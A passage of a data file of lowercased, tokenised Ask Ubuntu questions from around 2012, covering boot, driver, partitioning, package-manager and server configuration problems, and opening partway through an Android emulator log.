to 0 ( 0 ) setting value of oper_index to 0 ( 0 ) setting value of oper_count to 2 ( 2 ) setting value of in_ecbm to 0 ( 0 ) setting value of prl_version to 0 ( 0 ) setting value of preferred_mode to 15 ( 15 ) setting value of cdma_subscription_source to 1 ( 1 ) setting value of cdma_roaming_pref to 2 ( 2 ) emulator : sent '0012host : emulator:5555 ' to adb server emulator : ping program : /home/saun/downloads/android-sdk-linux/tools/ddms emulator : ping command : /home/saun/downloads/android-sdk-linux/tools/ddms ping emulator 20.0.1.0 `` tungsten graphics , inc '' `` mesa dri intel ( r ) ironlake mobile x86/mmx/sse2 '' `` 1.4 ( 2.1 mesa 8.0.2 ) '' emulator : error while connecting to socket '127.0.0.1:1970 ' : 111 - > connection refused emulator : asc 127.0.0.1:1970 : retrying connection . connector fd = 23 uncompressing linux ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... done , booting the kernel .
176061	what is unity 3d / 2d ?	i have n't used ubuntu since like version 9 or something . now that i just downloaded and installed v12 , i want to know what all the talk about `` unity 3d '' is about ? am i right to assume that ubuntu now uses the unity 3d ? and am i right to assume that unity is just the theming scheme of ubuntu ? ( pretty much like aero on windows 7 ? )
176066	why does n't ld_preload `` v4l1compat.so '' work with 64-bit skype ?	i am trying to troubleshoot my webcam and make it work with skype . one workaround that is often suggested is to ld_preload the v4l1compat.so file . but when trying that , i get an error message : fdr @ maggie : ~ $ ld_preload=/usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so skype error : ld.so : object '/usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so ' from ld_preload can not be preloaded : ignored . and i am rather sure the path is correct : fdr @ maggie : ~ $ ls /usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so /usr/lib/x86_64-linux-gnu/libv4l/v4l1compat.so and the kernel and skype have matching architecture : fdr @ maggie : ~ $ uname -a linux maggie 3.2.0-29-generic # 46-ubuntu smp fri jul 27 17:03:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux fdr @ maggie : ~ $ dpkg -s skype | grep architecture architecture : amd64 so my question is : what is causing the `` ... from ld_preload can not be preloaded : ignored '' error message ?
176067	mythtv what is causing empty ( 0 kb ) recordings	does anyone have the same problem or an answer to what is causing empty recordings in mythtv ? it also freezes up the backend when it occurs and a reboot seems to be the only thing to help . this problem occurs randomly during recordings . i have 3 pci dvb-t cards : 2 * terratec cinergy 1200 dvb-t and 1 * satelco easywatch pci dvb-t
176068	fresh 12.04 install on netbook	ok so , been working on this for hours now , and i have n't found anything that solves the problem yet . so , basically i have a netbook ( atom n450 processor , 1gb ram , 10.1 '' display ) with windows 7 installes and decided to try ubuntu . the installation goes well and all , desktop looks beautiful , system runs like charm , then i have to reboot and all heads down . grub loads fine , and i select ubuntu to boot . then nothing happens , black screen with nothing on it , ubuntu is not loading and i have to do a hard reset to get back , but no matter how many times i try , the black screen wo n't change . except , when i plug an external monitor to it ... then it loads up ! ! ! it 's been pretty frustrating and i hope someone has some experience on this issue , having to plug it to an external monitor every time i want to work on it is not a possibility , and so far no one seems to have the same problem . thanks in advance !
176075	alternatives for shotwell on kde	for various reasons i have recently converted from ubuntu unity to kde ( kubuntu ) . i have found suitably integrated solutions for most of the applications i used to use under unity on my new kde installation . all except for shotwell . the feature i miss , specifically , is to import all photos from a camera into various folders based on date . if , for example , photos were taken today , the 15th of august 2012 , using shotwell , they would be imported to the folder ~/pictures/2012/08/15/ . new folders for each year are automatically created by shotwell and within each year , one for each month , and within each month a folder for each day . i have tried both gwenview and digikam on kde , but i have been unable to set it up so they import the photos into these automatically created date-based folders . i realize that i can just continue using shotwell ( which i am ) , but i miss the integrated popups and such that i had when using shotwell on unity . can anyone help me find a kde application that is suitably integrated that can do this ?
176076	something is wrong with folders containing special characters	i can create folder with special characters ( example mkdir öäväaä ) , but ls -l in terminal shows ? ? v ? a ? . winscp and mc shows it right ( öäväaä ) . how can i make terminal to show me right characters ?
176077	update manager doesnt offer app updates	i currently use libreoffice 3.5 and i want to update to 3.6 . i know that the update manager also updates apps so i tried to update libreoffice through the update manager but the update manager didnt show any update available for libreoffice . how to fix this ?
176078	how to allocate partition ? ( while installing dualboot ubuntu & existing win7 )	i have been using the existing win7 for a long time and now want to install ubuntu dualboot . i have two drives c : ( 35.9gb free out of 111gb ) & d : ( 111gb free out of 165gb ) i tried ubuntu and after clicking install it asks me about the partition . it says my hard drive has 120gb , and on the slider the suggested partition reads 111gb on the left and 60gb on the right . how should i allocate the partition ? i do n't know why the numbers do n't sum up .. i 'm a complete noob at things like this so i 'd be very grateful if anyone can explain and help me with the partition ! thanks in advance ! : ) edit : and now my main question is that if i `` install alongside windows7 '' will it automatically partition for me ? : p
176083	removed grub menu , timer still stays	i 'm running a dual boot with 12.04 and windows 7 installed . i do n't use windows that often , so i decided to try and remove the boot menu to start up quicker . so far , the menu appears to not display , yet my screen still displays a blank screen with the distinctive `` orange thingy '' for approximately ten seconds . several forums i have read have instructed me to edit the etc/default/grub file to change the timeout to zero . i have done this , updated grub and restarted , yet this screen still persists . grub file currently reads as : grub_default= '' 0 '' # grub_hidden_timeout= '' 0 '' grub_hidden_timeout_quiet= '' true '' grub_timeout= '' 0 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' i have automatic login enabled and it takes approximately 35 seconds to go from powering on to my system being loaded . this is with a fresh install two days ago and my processor is an intel® core™ i3 cpu m 370 @ 2.40ghz × 4 . can someone please tell me if my computer is simply too slow to boot up any faster , or if there is step i have skipping in removing the boot screen ? any other information would be appreciated .
176086	how to force quickly to not include a dependency ? ( specifically : apport )	my case is this - the quickly-generated application contains some apport code , so quickly inserts python-apport in the dependencies list . i would like the application to be installable and run on linux mint as well , where this package is missing . i would like to wrap the apport code in a try/except importerror section , so that it is optional , and therefore python-apport would be better in the suggests or recommends section of the debian control file ( not sure what the difference is between suggests and recommends ) , and not in depends . how can i do this ? if this is not possible , what are the implications if i completely remove the generated apport folder and the apport-dependent code in it ? def add_info ( report ) : `` '' '' add report info '' '' '' if not apport.packaging.is_distro_package ( report [ 'package ' ] .split ( ) [ 0 ] ) : report [ 'thirdparty ' ] = 'true' report [ 'crashdb ' ] = 'variety'
176088	reinstall ubuntu without losing my personal folder	i 'm using ubuntu 12.04 . i do n't know what happened to my unity and unity 2d , but it does n't work anymore , only gnome classic does ( when i try to start using gnome-shell , the session starts with gnome classic ) . so when i log in using unity , the only things i see are desktop wallpaper and icons ( i think nautilus is working fine ) but no launcher and no panel ... the fact that gnome classic is launched instead of gnome-shell made think that there is a problem with my gpu proprietary driver ; though , i do n't know from where to open the propritary drivers manager through gnome classic . so what i want to do now is to completely reinstall ubuntu without losing my personal folder . actually , i 've already seen this choice when i was upgrading 11.10 to 12.04 , now it does n't exist . i should add , my home folder contains more than 50gb of files , so the online backup tools wo n't help . thank you .
176089	can not find display :0.1	i 'm using fujitsu lh531 laptop with ubuntu 12.04 , and with secondary 1440x900 monitor attached to the vga , confirmed by xrandr command . the problem is , i want to run a program ( vlc ) to the second monitor , but ca n't find a way for that . i 've tried , display=:0.1 vlc and a jumbled screen . trying display=:0.1 firefox , got error can not open display 0.1 . the current condition is that the dual monitor is worked as 2 separated screen ( e.g screen a showing firefox , screen b libreoffice ) can anyone please help on this ? the main goal is , how to run vlc ( program ) to specific monitor . below is the output of xrandr . screen 0 : minimum 320 x 200 , current 2806 x 900 , maximum 8192 x 8192 lvds1 connected 1366x768+0+132 ( normal left inverted right x axis y axis ) 309mm x 174mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1440x900+1366+0 ( normal left inverted right x axis y axis ) 370mm x 232mm 1440x900 59.9*+ 75.0 1280x1024 75.0 60.0 1280x960 60.0 1152x864 75.0 1024x768 75.1 70.1 60.0 832x624 74.6 800x600 75.0 60.3 56.2 640x480 75.0 60.0 720x400 70.1 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) thanks .
176097	how to remove windows 7 from alongside with 12.04	i have installed 12.04 alongside windows 7 . now i am happy with 12.04 that it works better for me . i really want to remove windows 7 from my hdd and left 12.04 to work with me , and got free hdd space back to 12.04 . is there an easy way to remove windows 7 out and keep 12.04 without problem ?
176102	how can i configure logrotate to copy/ssh apache log files	i 'm working on an apache logs analyser , it requires the apache log files to be imported into a directory for processing . i can not simply point it to the apache logs directory as it imports each file before deleting it . it also has no concept of duplicate records , so i can not set up a cron to copy /var/log/apache2/* into the folder . i assume logrotate is the best place to do this , but i do n't have a clue where to start to configure it . so my question is : how can i configure logrotate to ssh rotated apache log files to a remote host automatically ? the alternative is to copy locally and run scp & rm via cron , but a one-step ssh process would be nice .
176105	my mac ca n't boot ubuntu	yesterday , i ran my ubuntu live cd to check if my os partition was damaged , as i halted the computer from the mac 's button too much times . it seemed to be fine , so i restarted the computer . but now i ca n't boot from any ubuntu media , when booting from the hd or the cd the screen just stays black . what can i do ? update : the cd sometimes runs and ables me to boot from hd 's ubuntu ... it 's surely an efi problem . imac 21'5 '' late 2009 latest version of refind ( after removing refit ) ubuntu 12.04 amd64+mac
176106	why is compiling drivers for the ralink rt3070 wireless chipset failing ?	i 'm attempting to compile drivers for my telewell tw-wlan 802.11g/n usb adapter , but i 'm getting an error i can not solve during the make . i 'm following these instructions . i can get the adapter to work with built in rt2x00usb but it 's stuck in g mode instead of n , which was the whole point of acquiring this piece of hardware . steps i 've done so far : edit blacklist.conf & reboot to unload the built in drivers grab the files required for compiling ( 2008_1225_rt3070_linux_sta_v2.0.1.0 ) installed build tools with sudo apt-get install build-essential linux-headers-generic changed wpa supplicant settings from n to y in config.mk if anyone could check the error i 'm getting and help me overcome it , i 'd be very grateful !
176107	upload time-out with ubuntu one api ?	is there any kind of time-out when uploading a file with the ubuntu one cloud api ( link ) ? i have uploaded files < 30mb , but uploading files of size > 90mb get response : http/1.1 100 continue http/1.1 401 unauthorized date : wed , 15 aug 2012 09:20:07 gmt server : twistedweb/10.0.0 vary : cookie , accept-encoding etag : `` < some etag > '' x-bzr-revision-number : 5885 content-type : text/html ; charset=utf-8 via : 1.1 files.one.ubuntu.com content-length : 0 connection : close referring to this question , there is no filesize limit but a time-out is plausible . thanks in advance !
176113	desktop file for bash script	i have a .desktop file for a bash script , but when i launch the .desktop file nothing happens except that a terminal window is shown for half a second . if i run the bash script directly ( without the .desktop file ) , the script works fine ( bash file is called 'minecraft ' ) : # ! /bin/bash java -xmx1024m -xms512m -cp minecraft.jar net.minecraft.launcherframe the file is executable . this is my minecraft.desktop file : [ desktop entry ] type=application name=minecraft comment=minecraft icon=/home/bram/applications/minecraft/icon.png exec=/home/bram/applications/minecraft/minecraft terminal=true categories=minecraft ; game minecraft.desktop is located in ~/.local/share/applications
176115	what is the best way of installing the r package xlconnect ?	what is the best way of installing the r package xlconnect in ubuntu 12.04 x86 ? i tried to manually install it via r , using install.packages ( `` xlconnect '' , dependencies=true ) , but after half an hour of compiling , when i tried to load it , i got this error : > require ( xlconnect ) loading required package : xlconnect warning message : in library ( package , lib.loc = lib.loc , character.only = true , logical.return = true , : there is no package called âxlconnectâ i googled for xlconnect ubuntu but could n't find any obvious name for the package .
176117	java jogl file doesnt't compile - i have installed all the non-docs search results for `` jogl '' from usc	title says it all . i have installed everything , yet javac behaves like nothing has happened - no opengl objects are found when i try to compile copy-pasted code from tutorials . none . i 'm using the command-line javac from openjdk and eclipse with standard settings . no go with either . why ?
176120	moving banshee music to another computer	on my laptop i have many gigabytes of music that i ordered with album art on banshee . i have just bought a desktop computer and i would like to move my banshee library across . i can not simply move the music files as the files themselves are not all properly tagged . is there any way to simply transfer my hours of diligent sorting to my new computer ?
176121	dpkg error : `` trying to overwrite file , which is also in ... ''	for example : $ sudo apt-get install curl reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : bsh : depends : libjline-java but it is not going to be installed groovy : depends : libjline-java but it is not going to be installed rhino : depends : libjline-java but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i get the same or similar errors when i attempt to install clojure1.3 , leiningen , and several other packages . when i try the suggestion made in the error message , this is what happens : $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : diffstat linux-headers-3.2.0-26-generic linux-headers-3.2.0-26 dh-apparmor dkms html2text libmail-sendmail-perl libsys-hostname-long-perl use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libjline-java suggested packages : libjline-java-doc the following new packages will be installed : libjline-java 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 23 not fully installed or removed . need to get 0 b/72.0 kb of archives . after this operation , 129 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 226243 files and directories currently installed . ) unpacking libjline-java ( from ... /libjline-java_1.0-1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/libjline-java_1.0-1_all.deb ( -- unpack ) : trying to overwrite '/usr/share/java/jline.jar ' , which is also in package scala 2.9.2-400 errors were encountered while processing : /var/cache/apt/archives/libjline-java_1.0-1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : bsh : depends : libjline-java but it is not installed groovy : depends : libjline-java but it is not installed rhino : depends : libjline-java but it is not installed e : unmet dependencies . try using -f. please help me resolve this issue . thanks .
176122	how to update oracle java plugin for google-chrome ?	to begin with , i have already read the following solutions : can not update java plugin for google chrome how do i get java plugin for chrome ? installing chrome java plugin how to install oracle java web plugin on chrome in 12.04 ? and i hope this does not get marked as duplicate . i previously un-installed openjdk and icetea plugin and installed java-sdk 7 update 4 . i made a symbolic link to libnpjp.so in my installation folder to ~/.mozilla/plugins . everything ( including chrome ) was running smoothly as it should have . today , when i installed java-sdk 7 update 5 , i followed same steps as before but now , i get to see this : and this : i even un-installed and reinstalled chrome , but could not help . i am running ubuntu 12.04 , chrome version 21.0.1180.79 . this is really most annoying experience so far . ps : kindly do n't tell to reinstall java using some ppa .
176124	can i upgrade my graphics driver to support the latest opengl versions ?	my laptop is a core 2 duo dell from 2008 . i am trying to run some opengl programs . the program with following code does n't work : glutinitcontextversion ( 4 , 0 ) ; glutinitcontextflags ( glut_forward_compatible ) ; glutinitcontextprofile ( glut_core_profile ) ; the code requires opengl version of 4.0. glxinfo suggests opengl version 2.1 . the details of my intel graphics driver from system settings are : i do n't see anything useful in the additional drivers section , except one broadcom driver already activated . from ubuntu software centre , i tried searching some other drivers and found nvidia '173 ' and 'current ' drivers . but i am not sure , if i should install them . will it break whatever opengl programs are running fine ? what should i do to upgrade my graphics driver , so that it starts supporting latest opengl version like 4.0 to 4.3 ?
176130	is there a gtk media player that can synchronize id3 tags with directory structure ?	i 'm looking for a gtk media player which will keep the id3 tags of my tracks synchronised with my library directory structure . that is , when i change the artist tag of a track from x to y i 'd like the track to be moved automatically from ~/music/x to ~/music/y . obviously it would be nice if it loaded pretty quickly and was pretty light . does such a thing exist ? thanks !
176131	will ubuntu have full tablet functionality on a lenovo tablet pc ?	considering a lenovo tablet pc , ( not sure which one yet ) . will ubuntu work with full tablet functionality including touch screen ? do any touch screen tablet pc 's work ? ( panasonic , hp , dell , etc ... ) ?
176134	headphones do n't work on an acer aspire 5920g	all the problems i read about were all about the sound not working when they plugged the headphones in . i have the problem that my mic will work but the sound is still played on my built-in speakers . when i look at the sound settings , it does n't give me any options for headphones . i run 12.04 and never had this problem in windows . i run it on a acer aspire 5920g . any tips or ideas will be very helpful .
176135	is there a way to hide a folder on the desktop without '.dot ' naming ?	i 'm wondering if it 's possible to hide a folder without renaming it with a dot on the desktop . ubuntu 12.04 thanks
176138	can not run cgi as httpd.conf is empty !	for help i checked out these links : this this and this i have an empty httpd.conf file but apache2.conf is not and the formats and tags in apache2.conf are similar to what httpd.conf has in windows as a result of which it has become a bit confusing ! i have cgi enabled and running on windows by changing the httpd.conf ( of windows ) file . i am using ubuntu 11.10 and i want to enable python ( 2.7.3 ) cgi . please help me solve this problem .
176141	how to create dos boot usb flash drive with ( x ) ubuntu	i 'm trying to boot xubuntu from usb flash drive on my old laptop fujitsu-siemens but it shows `` missing operating system . operating system not found '' . although the flash drive works on my current laptop . can i make dos usb flash drive with ( x ) ubuntu live cd on it ? i tried various windows programs to make a bootable usb , and xubuntu startup-disk without success .
176145	changing brightness under unity completely hangs the system	i have a dell latop and ubuntu 12.04 . the system will completely hang when i try to adjust the brightness either through the function buttons or through the system 's brightness manager module . this hangs the system beyond the reisub trick , i have to manually shut it down and i 've had hard drive warnings because of this . brightness adjustment works flawlessly with kde , so the issue is with the unity shell . what can i do about this ? should i just report a bug or is there something i should try first ?
176148	ubuntu 12.04 mysql does n't start on reboot ; starts ok later manually	i 've just installed mysql to support a mediawiki install on 12.04 64bit . everything appears to be working ok , except that at boot-up , mysql server fails to start . this results in an error appearing on the webpage : ca n't connect to local mysql server through socket /var/run/mysqld/mysqld.sock when i discover this , and run sudo service mysql start it all works ok after that until the next reboot . i ca n't figure out what is going on . there appear to be several similar issues being reported , however most of these appear to be outright failure to start - i.e . manual start or on boot-up fails . i have n't seen anything relating to a `` transient '' error like this . for the record , i 've got a fairly standard install - i did n't fiddle with settings - just the bind address in /etc/mysql/my.cnf i thought maybe something to do with drive mounting , but datadir is on /var which is on the main partition . any clues ? suggestions even for a workaround ? only workaround i 'm toying with is to set a cronjob at intervals of every half hour or so .
176150	personalize session list on ( kdm|gdm|lightdm|some_other )	a bit of an odd question : i want to change the list of sessions available on ( kdm|gdm|lightdm|some_other ) to a user , without affecting the sessions available to others . specifically , i have one user that is not very computer-savvy , and i want to prevent the said user from changing session type accidentally . i dont want this to affect the other users . can it be done ? i 'd gladly switch my display manager to whatever one supports this
176152	any ubuntu/torrent friendly vpn provider recommendations ?	i am dropping the service ( vpnuk ) due to poor customer support , so does anybody have any good ubuntu/torrent friendly vpn provider recommendations ?
176154	why does n't this .desktop script launch the program ?	the following script creates an icon in dash home , but does n't launch the program . any ideas why not ? [ desktop entry ] name=civ 5 comment=civ & 5 exec=sh -c `` cd /home/mark/.wine/drive_c/program files/sid meier 's civilization v ; wine civilizationv.exe '' icon=wine terminal=false type=application categories=wine ; startupnotify=true
176155	ca n't boot ubuntu 12.04 from external hard drive using mac	recently , i upgraded the ram and hard drive on my early 2008 macbook to improve the performance . rather than throw away the old hard drive , i bought an enclosure for it to turn it into an external hard drive , and , since all the data was migrated to my new drive , i decided to install ubuntu on it for funsies ( note : i am a near-total ubuntu n00b ) . my first attempt to install ubuntu did n't work ( it gave me errors about not being able to find the bios or something ) , but my second attempt finished successfully ( ca n't remember what , if anything , i did different ) . however , when i plug the external drive into my macbook , it gives me a message saying it ca n't read the disk . moreover , when i go into the startup manager ( i.e . : what you get when you turn on the macbook while holding the option key ) , the external drive is not one of the available startup disks . i thought this might be because i have an older macbook , so i tried booting it with my mom 's late 2011 macbook , and got the same results . then i tried booting it through my dad 's dell laptop that runs windows 7 , and that time it worked . this is really counter intuitive to me , since the hard drive originally came from a macbook , so if anything you 'd think it would be less compatible with the windows laptop than the macbook . in case it helps , here 's a link to a picture of how i set up the partition table while doing the install ( not shown there is the fact that i checked the `` format ? '' box next to the /boot partition , since it gave me a warning when i tried to continue the installation without doing so ) anyone have any clue at all ? if it helps , the hard drive i 'm using is a 120gb 5400-rpm serial ata hard disk drive .
176156	ubuntu 12.04 wo n't recognise my 2 monitors	i 've got 2 monitors plugged into my nvidia quadro fx1700 graphics card but ubuntu only recognises my hd monitor ( says its a laptop monitor ) and ignores the other one . is there any way i can force it to recognise the other monitor ? i have seen on other posts that the laptop thingis just a bug .
176170	list of applications that support quicklists	i was wondering if there was a list of applications that support qicklists , and how to get them working ?
176171	why ca n't i install 64 bit ubuntu inside microsoft virtual pc ?	i have intel core 2 duo processor which is x86_64 , i have installed microsoft virtual pc on this intel laptop , when i tried to install x86_64 ubuntu ( amd64 ) on my virtual pc , i get a kernel error message . i really would like to use ubuntu on this machine . can anyone help ?
176174	how to stop automatic time update ?	i want to know is there any way to stop automatic time update permanently in ubuntu 12.04 . thank you
176176	permission to referance file in git changed on push	i have currently set up an ubuntu-server with gitolite and it works like a charm for the most parts . the only issue was when i downloaded and setup a web-gui ( gitlist ) , to share my repositories . im short the problem is that everytime i push up some updates the file permissions for some reference-files in the repository has their file-permissions changed and apache cant access them ( and thus , the web-gui wont get access to the repository ) . when i installed it i did the following steps : created a user git and setup the repositorys on this user added www-data user to the git-group with usermod -a -g git www-data made sure git was the group for the repositories : sudo chgrp -r git repositories/ chmod the folders to give access for all users in the group : sudo chmod ug+s repositories/ as soon as i do a push with git the file permission for 2-3 files are changed ( for instance the '/repository/ [ name ] /refs/head/master ' file ) and it is set to -rw -- -- -- - , and only the git-user got access to the file . no other users can read or write here . i would like that those files would stay with the given permission ( for instance chmod 755 ) after i do a git push , so i dont need to update the permissions every time someone dos a push .
176187	how to create the partition from unallocated space	i have some free space in my hard disk and i want to create it as a ntfs partition to able to detect in my windows xp . i am completely new to linux/ubuntu .
176189	pkgproblemresolver error when running package manager and updating 12.04	ubuntu 12.04 ( original ubuntu version was 8.xx ) i have a message on the top bar that an error occurred and to run package manager . i received the following message after running package manager : e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages i ran : sudo apt-get update & & sudo apt-get upgrade the following packages have been kept back : evolution-common evolution-indicator evolution-plugins libnspr4 libnspr4 : i386 libnspr4-0d 0 upgraded , 0 newly installed , 0 to remove and 6 not upgraded . newbie not sure what to do next .
176194	how to install pentesting tools ?	i am learning pentesting . i do n't want to install backtrack as my main os . instead , i 'd like to install the relevant tools on my ubuntu 12.04 system . my understanding is that it is possible to install this software on ubuntu , but i do n't know how . how can i do this ?
176198	how do i add parameters to unity icons ?	many posts tell you to copy files from /usr/share/applications to your home directory . well , unfortunately that does not work for non-ubuntu stuff . can anybody show me how to add this xterm -bg black -fg white -fn 10x20 to my xterm icon ?
176203	12.04 drops wired network if wireless connects	this is a little different then most of the questions i have seen here . when i am at my office i keep my lenovo thinkpad t61p running ubuntu 12.04 x64 connected via wired ethernet . i also typically leave the wireless radios on . after a recent update the behavior of laptop in regards to the networks has changed . it used to be that if the laptop had a wired connection , the wired would supersede the wireless . now , when i get to work and plug the laptop in and power it up , it connects via wired ( correct behavior ) , shortly after the wireless begins searching for its favorite network ( also correct ) but as soon as it finds a network to connect to , i lose internet . if i disconnect from the wireless network , leaving the wireless radios powered on , and refresh the wired connection , all is well again . powering down the wireless radios also corrects the problem . how can i set this up so that the wired network ( if available ) always has precedence over the wireless ?
176204	upgrade problem- 11.10 to 12.04 ?	i tried to upgrade to 12.04 using the update manager in 11.10 . it opens up a dialog which says downloading upgrade tools and just closes . anyways to upgrade ? or a working solution to this problem ? i would like to upgrade internally therefore keeping all of my files instead of installing a new version of ubuntu entirely . any ideas ?
176206	how do i create a dd image of multiple filesystems in xubuntu 12.04 ?	i have four filesystems with various samples files on them that i want to combine into a single dd image , how would i do this using dd ? should i be using something else other than dd ? thanks .
176207	amazon ec2 : authentication failure after error sudo : must be setuid root	i was trying to change permission on a folder in a amazon ebs volume mounted on a amazon ec2 running ubuntu ec2 . when i entered the command sudo chmod -r u+rw , go-rw /mnt/my-address i go the message sudo : must be setuid root now i am unable to ssh into the my amazon ec2 instance , getting the below message what is wrong ?
176215	installation without splashscreen / headless	i recently pulled a computer out of storage that has a faulty video card . it still displays standard 80x25 terminal screens fine , but anything beyond that causes the video card to fail and require rebooting . as i intend to use this as a headless server , i 'm not really interested in buying a new video card just for the installation . the problem i run into is that ubuntu - including the server and alternate installers - kick you to a ( comparatively ) high-res splashscreen that causes my video card to turn off , even though the rest of the install process uses a 80x25 tui . i 've tried preseeding , but i have no experience with that and not having feedback makes my life difficult . as i see it , there are ( at least ) two ways to accomplish this , neither of which i can find a way to accomplish : pass a parameter that starts ssh ( or vnc ) and operate the install from another machine . disable the high-resolution splash screen . some other method that i have n't thought of . i would prefer to use ubuntu server , but i 'm not married to it . for what it 's worth , every other distro i 've tried ( debian , centos , arch ) also have high-res splashscreens . the only one that does , in fact , work is freenas , but i 'd strongly prefer a linux variant over bsd .
176223	screen capture as stream over lan	i 'm searching for a solution to capture my desktop and output it as a live stream for clients in a local network . i already tried ffmpeg and vlc , but the results were that it was not a live-stream . it became a kind of recording that always started from the beginning when trying to watch . i 'm trying my luck now with webcamstudio , but i have n't had any success yet . does anyone know a solution for my problem ?
176228	how to use sed to edit /var/log/apt/history.log in order to apt-get remove numerous installed packages ?	after running these two commands : sudo apt-get install ubuntu-desktop sudo apt-get remove ubuntu-desktop i am left with a glut of installed packages that i do n't need/want on my lubuntu install . i just wanted to see how unity performed under lubuntu . i 've discovered i can view the list of installed programs by looking at my /var/log/apt/history.log i 'd like to simply cut and paste this list into a sudo apt-get remove command but first i need to delete the portions apt-get wo n't understand . basically everything inside the parenthesis ( including parenthesis themselves ) needs to go . additionally the following comma and space after each entry will also need deleting . the closest i 've come with sed so far is : sed -e 's/ ( . * ) , [ [ : space : ] ] //g ' apt-log.txt this is not right since it deletes almost everything . i presume this is because its matching the very last instance of `` ) , `` and deleting everything before it until `` ( `` . here 's a link to program list from the log i 'm trying to edit . as you can imagine , i would rather not edit that list by hand . i know next to nothing about regular expressions and am trying to learn but a few specific pointers would go a long way . or maybe there 's a much better way to go about this ?
176232	problem upgrading from 10.04 lts to 12.04.1 lts	ubuntu 12.04.1 was released yesterday and i still ca n't update from 10.04
176238	dns issues with 12.04 , apt-get , and openssh	on a fresh ubuntu 12.04 installation , we noticed that we were having issues with openssh as it was constantly breaking the connection randomly after a period of time . after doing some debugging , we found that we were able to consistently replicate the issue as follows : ping google.com # works sudo apt-get clean # no issues sudo apt-get update # stays at 0 % , must ^c to exit ping google.com # no longer connects the only method that can be used to restore dns access is to reboot the machine . additional info : we have replaced the resolve.conf symlink with an actual file to specify google 's nameserver 8.8.8.8 ( which i have personally done before in 12.04 in our network without issues ) . the machine is in a static network without dhcp and is issued a static ip address . there are no issues pinging the machine from elsewhere in the network , but when openssh was installed the ssh connection would be refused . anyone have any suggestions on how to resolve this ?
176241	should i be worried ? md5	i installed ubuntu 12.04 a few weeks ago , from a download off of the website . i still have the dvd used . i was talking to my friend today about it and he mentioned something about checking the hash to make sure it was a good copy , as sometimes the file can get corrupted by a third party . my question is , can i check the hash of the dvd or even off of the versio
176245	how can i change the hud key from the command line ?	i know i can change the hud shortcut key by going into system settings ... > keyboard > shortcuts > launchers > key to show the hud . i need to do this from the command line , so i can put it in a postinstall script called from preseed .
176248	share folders between two ubuntu 12.04 machines	i have two machines ( 1 laptop , 1 desktop ) on same network connected to a router both have ubuntu 12.04 . i need to share my e.g . `` movies drive '' from desktop computer so that i can watch those on laptop just by accessing it through nautilus . currently in my nautilus it only shows windows networks under browse networks and fails to show my desktop over there . thanks
176251	ubuntu wont boot	i have tried to use grub repair and get the following : http : //paste.ubuntu.com/1149235/ when i boot from a live cd i can see my os files , etc . i need help . i have been down fro 1 1/2 days and really need to get back up .
176256	best ubuntu version for virtualbox host	what is the best version to use as a virtualbox host os ? is it 12.04 , or 9.04 ? i get the notion that an older system runs faster . is this true ? i especially have to consider the amount of ram available as well as usage by the host .
176264	ubuntu studio and kx studio distros	i am interested in installing a pro-audio linux distro . i do hesitate between ubuntu studio and kx studio ( tango studio and artistx could also be an option ) . i would like to know what are the main differences between ubuntu and kx studio ? moreover , would there be any advantage to add xk packages to ubuntu studio ?
176268	how to safely back up the `` private '' folder ?	i have an ecryptfs `` private '' folder in my home directory , and it is set up to automatically mount whenever i log in . i want to set up automatic backups to a network drive , but i do n't want the contents of private to be readable on the remote server . my understanding is that the ubuntu `` backup '' utility would run while i 'm logged in , so it would see the folder contents without encryption . i 'm backing up from a laptop , so it is essentially only on when i am logged in . i know that the private folder is essentially a mounted filesystem , so it seems like i should be able to backup the encrypted image rather than the cleartext contents . what steps are needed to safely back it up , while maintaining the encryption ? note that i 'm already familiar with the backup tools available , this question is about dealing with the ecryptfs folder safely .
176270	why ca n't i use unity 3d on an hp pavilion g4 ?	i have recently bought a new computer and loaded ubuntu 12.04 along side windows 7 . i have run /usr/lib/nux/unity_support_test -p and receive a no on not software rendered , yes on everything else . i do n't know what this means or how to change it . i also ca n't figure out what command to use to provide the short list of my system hardware so that i can present it here . please help ! i am using a hp pavilion g4 , purchased a week ago from best buy . it has a amd radeon hd 6480g graphics card with the vesa : intel速sandybridge mobile graphics driver . this is a brand new computer so i ca n't imagine it would not be able to run unity . one thing of note would be that i had to install ubuntu with nomodeset selected . i do n't know if that is an issue here . what can i do to get my system to run unity 3d ? i followed the link you gave but did n't find that the video card i think i have is mentioned there . i checked my video card in the terminal and it says i have intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) . i do n't think this is the same card best buy advertised the computer with but i do n't know . anyway , i 'm not sure if this is an ati driver so i did n't follow through with installing the drivers mentioned in the link you provided . what should i do ? jorge , thanks for the advice . since i started this without signing up i can not edit my previous posts and must keep adding new ones . i 'm not sure what info to include for you so i 've attached some results here : jeff @ localhost : ~ $ sudo lspci -nn 00:00.0 host bridge [ 0600 ] : intel corporation 2nd generation core processor family dram controller [ 8086:0104 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0106 ] ( rev 09 ) 00:16.0 communication controller [ 0780 ] : intel corporation 6 series/c200 series chipset family mei controller # 1 [ 8086:1c3a ] ( rev 